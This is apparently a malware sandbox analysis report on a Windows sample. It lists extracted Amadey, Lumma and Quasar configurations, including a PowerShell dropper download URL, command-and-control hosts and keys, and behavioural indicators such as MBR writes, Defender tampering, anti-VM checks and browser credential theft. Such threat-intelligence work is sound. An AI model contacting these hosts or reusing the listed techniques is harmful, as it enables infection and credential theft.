amadey | b2b52732bddd97f278c7ffaa0b892ab43064a6443c1cdc27c2b0115c1c25019b

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
01/04/2025, 18:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2025-04-01_af6e3955b2d8c162d211d43ff6d72231_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Size

938KB
MD5

af6e3955b2d8c162d211d43ff6d72231
SHA1

8bf0166728a9808f6b22441269ce92b51405fe5a
SHA256

b2b52732bddd97f278c7ffaa0b892ab43064a6443c1cdc27c2b0115c1c25019b
SHA512

43555081a7b0ece8b0d7fc40fb647229073f659e3f43fa02569c7a02c83966990cd68122764719459f3fb39af82f301ae5844ad08d37a77a251dc501ce7d8940
SSDEEP

24576:KqDEvCTbMWu7rQYlBQcBiT6rprG8a46u:KTvC/MTQYxsWR7a46

Score

10^/10

amadey lumma quasar 092155 cyberpunk faec90 bootkit defense_evasion discovery execution exploit persistence privilege_escalation spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

http://176.113.115.6

Attributes

install_dir
bb556cff4a
install_file
rapes.exe
strings_key
a131b127e996a898cd19ffb2d92e481b
url_paths
/Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

https://rodformi.run/aUosoz

https://metalsyo.digital/opsa

https://ironloxp.live/aksdd

https://navstarx.shop/FoaJSi

https://starcloc.bet/GOksAo

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://spacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

https://hadvennture.top/GKsiio

https://anavstarx.shop/FoaJSi

https://dmetalsyo.digital/opsa

https://-targett.top/dsANGt

https://wstarcloc.bet/GOksAo

https://atargett.top/dsANGt

Extracted

Family

quasar

Version

1.4.1

Botnet

CyberPunk

dakar.wohowoho.com:443

dakar.wohowoho.com:80

206.206.76.75:443

206.206.76.75:80

62.60.226.176:80

62.60.226.176:443

Mutex

5e809a5b-bb22-41b6-af20-5285e99040d3

Attributes

encryption_key
A98DEEE2D49BDF1C5183B3079E9B28E281586F6F
install_name
chrome.exe
log_directory
Logs
reconnect_delay
30000
startup_key
GoogleChrome
subdirectory
Google\Chrome

Extracted

Family

amadey

Version

5.33

Botnet

faec90

Attributes

install_dir
52907c9546
install_file
tgvazx.exe
strings_key
cc9d94f7503394295f4824f8cfd50608
url_paths
/Di0Her478/index.php

rc4.plain

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma

Modifies security service 2 TTPs 2 IoCs

defense_evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security	reg.exe

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 2 IoCs

resource	yara_rule
behavioral1/files/0x00070000000242f2-174.dat	family_quasar
behavioral1/memory/4596-187-0x0000000000980000-0x0000000000CA2000-memory.dmp	family_quasar

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

description	pid	Process	procid_target
PID 7308 created 2732	7308	MSBuild.exe	49
PID 5104 created 2732	5104	CamMenuMaker.exe	49

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 10 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	2eff251326.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempQXO5GGPXMOMIFNHLOX1OEN7KVVB1EZJH.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	3537b60da7.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	994f177e74.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	97d82266f8.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	abf41d0bfc.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	5ac5fd8d48.exe

Blocklisted process makes network request 2 IoCs

flow	pid	Process
13	1448	powershell.exe
240	7340	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3312	powershell.exe
8624	powershell.exe
1448	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 23 IoCs

flow	pid	Process
99	5152	Abspawnhlp.exe
99	5152	Abspawnhlp.exe
99	5152	Abspawnhlp.exe
99	5152	Abspawnhlp.exe
112	5520	svchost.exe
173	4828	rapes.exe
189	4828	rapes.exe
189	4828	rapes.exe
189	4828	rapes.exe
189	4828	rapes.exe
189	4828	rapes.exe
189	4828	rapes.exe
13	1448	powershell.exe
29	4828	rapes.exe
101	4828	rapes.exe
114	4828	rapes.exe
169	4828	rapes.exe
240	7340	powershell.exe
40	4828	rapes.exe
40	4828	rapes.exe
40	4828	rapes.exe
40	4828	rapes.exe
86	4828	rapes.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File created	C:\Windows\System32\Drivers\9e186137.sys	8c6895b6.exe
File created	C:\Windows\System32\Drivers\klupd_9e186137a_arkmon.sys	8c6895b6.exe
File created	C:\Windows\System32\Drivers\klupd_9e186137a_klbg.sys	8c6895b6.exe

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
5436	takeown.exe
2432	icacls.exe

Sets service image path in registry 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\9e186137\ImagePath = "System32\\Drivers\\9e186137.sys"	8c6895b6.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_9e186137a_arkmon\ImagePath = "System32\\Drivers\\klupd_9e186137a_arkmon.sys"	8c6895b6.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_9e186137a_klbg\ImagePath = "System32\\Drivers\\klupd_9e186137a_klbg.sys"	8c6895b6.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_9e186137a_klark\ImagePath = "System32\\Drivers\\klupd_9e186137a_klark.sys"	8c6895b6.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_9e186137a_mark\ImagePath = "System32\\Drivers\\klupd_9e186137a_mark.sys"	8c6895b6.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_9e186137a_arkmon_7C924DD4\ImagePath = "\\??\\C:\\KVRT2020_Data\\Temp\\7C924DD4D20055C80007791130E2D03F\\klupd_9e186137a_arkmon.sys"	8c6895b6.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 20 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	97d82266f8.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempQXO5GGPXMOMIFNHLOX1OEN7KVVB1EZJH.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3537b60da7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3537b60da7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	abf41d0bfc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	5ac5fd8d48.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempQXO5GGPXMOMIFNHLOX1OEN7KVVB1EZJH.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	97d82266f8.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	abf41d0bfc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	5ac5fd8d48.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	994f177e74.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	994f177e74.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2eff251326.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2eff251326.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe

Checks computer location settings 2 TTPs 11 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation	rapes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation	PQPYAYJJ.exe
Key value queried	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation	261.exe
Key value queried	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation	261.exe
Key value queried	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation	7IIl2eE.exe
Key value queried	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation	TempQXO5GGPXMOMIFNHLOX1OEN7KVVB1EZJH.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation	apple.exe
Key value queried	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation	Abspawnhlp.exe
Key value queried	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation	LXUZVRLG.exe
Key value queried	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation	KRWXARXD.exe

Deletes itself 1 IoCs

pid	Process
2256	w32tm.exe

Executes dropped EXE 55 IoCs

pid	Process
5032	TempQXO5GGPXMOMIFNHLOX1OEN7KVVB1EZJH.EXE
4828	rapes.exe
116	PQPYAYJJ.exe
3204	Abspawnhlp.exe
3692	Abspawnhlp.exe
5744	h8NlU62.exe
3668	rapes.exe
4596	NHq7LaU.exe
3156	chrome.exe
5792	qWR3lUj.exe
3864	HAe88WC.exe
6032	apple.exe
4964	261.exe
2824	261.exe
2996	NHq7LaU.exe
2676	Rm3cVPI.exe
2060	7IIl2eE.exe
1520	Abspawnhlp.exe
5896	Abspawnhlp.exe
5792	LXUZVRLG.exe
4856	Abspawnhlp.exe
3888	p3hx1_003.exe
3428	890172171_x64.exe
1908	Passwords.com
2464	XOPPRUc.exe
4492	tzutil.exe
2256	w32tm.exe
2012	h8NlU62.exe
6192	Abspawnhlp.exe
6616	Updater.exe
6852	rapes.exe
2988	CamMenuMaker.exe
3004	CamMenuMaker.exe
7240	TbV75ZR.exe
7708	IEYKSCXV.exe
7904	PQPYAYJJ.exe
8080	KRWXARXD.exe
4600	CamMenuMaker.exe
4620	3537b60da7.exe
8472	dat2A7.exe
5844	Abspawnhlp.exe
8988	Abspawnhlp.exe
3872	97d82266f8.exe
9868	HAe88WC.exe
10368	abf41d0bfc.exe
10744	d9f1658.exe
11084	dat483D.exe
12020	Abspawnhlp.exe
6076	8c6895b6.exe
7772	Abspawnhlp.exe
5228	5ac5fd8d48.exe
10420	svchost015.exe
7848	994f177e74.exe
6972	svchost015.exe
4312	2eff251326.exe

Identifies Wine through registry keys 2 TTPs 10 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine	3537b60da7.exe
Key opened	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine	abf41d0bfc.exe
Key opened	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine	5ac5fd8d48.exe
Key opened	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine	994f177e74.exe
Key opened	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine	TempQXO5GGPXMOMIFNHLOX1OEN7KVVB1EZJH.EXE
Key opened	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine	97d82266f8.exe
Key opened	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine	2eff251326.exe

Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs

defense_evasion

Safe Mode Boot

T1562.009

description	ioc	Process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\9e186137.sys	8c6895b6.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\9e186137.sys\ = "Driver"	8c6895b6.exe

Loads dropped DLL 64 IoCs

pid	Process
3204	Abspawnhlp.exe
3204	Abspawnhlp.exe
3204	Abspawnhlp.exe
3204	Abspawnhlp.exe
3204	Abspawnhlp.exe
3692	Abspawnhlp.exe
3692	Abspawnhlp.exe
3692	Abspawnhlp.exe
3692	Abspawnhlp.exe
3692	Abspawnhlp.exe
5152	Abspawnhlp.exe
1520	Abspawnhlp.exe
1520	Abspawnhlp.exe
1520	Abspawnhlp.exe
1520	Abspawnhlp.exe
1520	Abspawnhlp.exe
5896	Abspawnhlp.exe
5896	Abspawnhlp.exe
5896	Abspawnhlp.exe
5896	Abspawnhlp.exe
5896	Abspawnhlp.exe
4856	Abspawnhlp.exe
4856	Abspawnhlp.exe
4856	Abspawnhlp.exe
4856	Abspawnhlp.exe
4856	Abspawnhlp.exe
4288	Abspawnhlp.exe
5440	Abspawnhlp.exe
2988	CamMenuMaker.exe
2988	CamMenuMaker.exe
2988	CamMenuMaker.exe
2988	CamMenuMaker.exe
3004	CamMenuMaker.exe
3004	CamMenuMaker.exe
3004	CamMenuMaker.exe
3004	CamMenuMaker.exe
4600	CamMenuMaker.exe
4600	CamMenuMaker.exe
4600	CamMenuMaker.exe
4600	CamMenuMaker.exe
4600	CamMenuMaker.exe
5844	Abspawnhlp.exe
5844	Abspawnhlp.exe
5844	Abspawnhlp.exe
5844	Abspawnhlp.exe
5844	Abspawnhlp.exe
8988	Abspawnhlp.exe
8988	Abspawnhlp.exe
8988	Abspawnhlp.exe
8988	Abspawnhlp.exe
8988	Abspawnhlp.exe
5104	CamMenuMaker.exe
9724	CamMenuMaker.exe
12020	Abspawnhlp.exe
12020	Abspawnhlp.exe
12020	Abspawnhlp.exe
12020	Abspawnhlp.exe
12020	Abspawnhlp.exe
6076	8c6895b6.exe
6076	8c6895b6.exe
6076	8c6895b6.exe
6076	8c6895b6.exe
6076	8c6895b6.exe
6076	8c6895b6.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
5436	takeown.exe
2432	icacls.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\43f0fe7e-357e-4ced-8842-da8140514f2d = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\{dfb8b117-fb07-4986-bffb-ada7d4c25ae9}\\43f0fe7e-357e-4ced-8842-da8140514f2d.cmd\""	8c6895b6.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\2eff251326.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10408640101\\2eff251326.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\F:	8c6895b6.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe

Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PHYSICALDRIVE0	3537b60da7.exe
File opened for modification	\??\PhysicalDrive0	8c6895b6.exe

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x00030000000232ea-36278.dat	autoit_exe

Drops file in System32 directory 57 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\config\systemprofile\Abspawnhlp.exe	dat2A7.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\msvcr80.dll	dat2A7.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\buttercup.swf	dat2A7.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\svcPower_test\Abspawnhlp.exe	Abspawnhlp.exe
File created	C:\Windows\SysWOW64\config\systemprofile\declarator.txt	dat483D.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\comNotepad_beta\buttercup.swf	Abspawnhlp.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\declarator.txt	dat2A7.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\buttercup.swf	dat483D.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\libssl-1_1.dll	dat483D.exe
File created	C:\Windows\SysWOW64\config\systemprofile\msvcr80.dll	dat483D.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\libcrypto-1_1.dll	dat2A7.exe
File created	C:\Windows\SysWOW64\config\systemprofile\Comn.dll	dat2A7.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\comNotepad_beta\Comn.dll	Abspawnhlp.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\libssl-1_1.dll	dat2A7.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\svcPower_test\Abspawnhlp.exe	Abspawnhlp.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\libcrypto-1_1.dll	dat483D.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\comNotepad_beta\Abspawnhlp.exe	Abspawnhlp.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\comNotepad_beta\Abspawnhlp.exe	Abspawnhlp.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\RMS_RDP_1	dat2A7.exe
File created	C:\Windows\SysWOW64\config\systemprofile\Abspawnhlp.exe	dat483D.exe
File created	C:\Windows\SysWOW64\config\systemprofile\declarator.txt	dat2A7.exe
File created	C:\Windows\SysWOW64\config\systemprofile\libcrypto-1_1.dll	dat2A7.exe
File created	C:\Windows\SysWOW64\config\systemprofile\msvcr80.dll	dat2A7.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\svcPower_test\libcrypto-1_1.dll	Abspawnhlp.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\Abspawnhlp.exe	dat483D.exe
File created	C:\Windows\SysWOW64\config\systemprofile\libcrypto-1_1.dll	dat483D.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\svcPower_test\msvcr80.dll	Abspawnhlp.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\Comn.dll	dat2A7.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\declarator.txt	dat483D.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\msvcp80.dll	dat483D.exe
File created	C:\Windows\SysWOW64\config\systemprofile\msvcp80.dll	dat483D.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\comNotepad_beta\msvcr80.dll	Abspawnhlp.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\ZFMTCO6O.htm	Updater.exe
File created	C:\Windows\SysWOW64\config\systemprofile\msvcp80.dll	dat2A7.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\svcPower_test\Comn.dll	Abspawnhlp.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\svcPower_test\msvcp80.dll	Abspawnhlp.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\Comn.dll	dat483D.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\msvcr80.dll	dat483D.exe
File created	C:\Windows\SysWOW64\config\systemprofile\Comn.dll	dat483D.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\comNotepad_beta\libcrypto-1_1.dll	Abspawnhlp.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\Package	dat2A7.exe
File created	C:\Windows\SysWOW64\config\systemprofile\buttercup.swf	dat2A7.exe
File created	C:\Windows\SysWOW64\config\systemprofile\libssl-1_1.dll	dat2A7.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\SearchWiwer7_8	dat483D.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\svcPower_test\buttercup.swf	Abspawnhlp.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\svcPower_test\libssl-1_1.dll	Abspawnhlp.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\svcPower_test\declarator.txt	Abspawnhlp.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\Package	dat483D.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\comNotepad_beta\msvcp80.dll	Abspawnhlp.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\comNotepad_beta\libssl-1_1.dll	Abspawnhlp.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\Abspawnhlp.exe	dat2A7.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\GZT72FQ8.htm	Updater.exe
File created	C:\Windows\SysWOW64\config\systemprofile\buttercup.swf	dat483D.exe
File created	C:\Windows\SysWOW64\config\systemprofile\libssl-1_1.dll	dat483D.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\E8MRX6PW.htm	Updater.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\msvcp80.dll	dat2A7.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\comNotepad_beta\declarator.txt	Abspawnhlp.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
4672	tasklist.exe
5132	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs

pid	Process
5032	TempQXO5GGPXMOMIFNHLOX1OEN7KVVB1EZJH.EXE
4828	rapes.exe
3668	rapes.exe
6852	rapes.exe
4620	3537b60da7.exe
3872	97d82266f8.exe
10368	abf41d0bfc.exe
5228	5ac5fd8d48.exe
7848	994f177e74.exe
4312	2eff251326.exe

Suspicious use of SetThreadContext 21 IoCs

description	pid	Process	procid_target
PID 5744 set thread context of 5436	5744	h8NlU62.exe	110
PID 3692 set thread context of 5152	3692	Abspawnhlp.exe	113
PID 5792 set thread context of 2628	5792	qWR3lUj.exe	121
PID 3864 set thread context of 1020	3864	HAe88WC.exe	126
PID 3692 set thread context of 4160	3692	Abspawnhlp.exe	129
PID 2464 set thread context of 2104	2464	XOPPRUc.exe	237
PID 4856 set thread context of 5440	4856	Abspawnhlp.exe	241
PID 5896 set thread context of 4288	5896	Abspawnhlp.exe	238
PID 2012 set thread context of 6244	2012	h8NlU62.exe	246
PID 5152 set thread context of 6192	5152	Abspawnhlp.exe	244
PID 7240 set thread context of 7308	7240	TbV75ZR.exe	263
PID 5896 set thread context of 6512	5896	Abspawnhlp.exe	252
PID 4856 set thread context of 6700	4856	Abspawnhlp.exe	255
PID 9868 set thread context of 9920	9868	HAe88WC.exe	281
PID 3004 set thread context of 9256	3004	CamMenuMaker.exe	277
PID 8988 set thread context of 10600	8988	Abspawnhlp.exe	284
PID 5228 set thread context of 10420	5228	5ac5fd8d48.exe	306
PID 4600 set thread context of 11232	4600	CamMenuMaker.exe	304
PID 7772 set thread context of 8704	7772	Abspawnhlp.exe	314
PID 7848 set thread context of 6972	7848	994f177e74.exe	333
PID 8988 set thread context of 9248	8988	Abspawnhlp.exe	309

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	d9f1658.exe
File opened (read-only)	\??\VBoxMiniRdrDN	8c6895b6.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui	cmd.exe
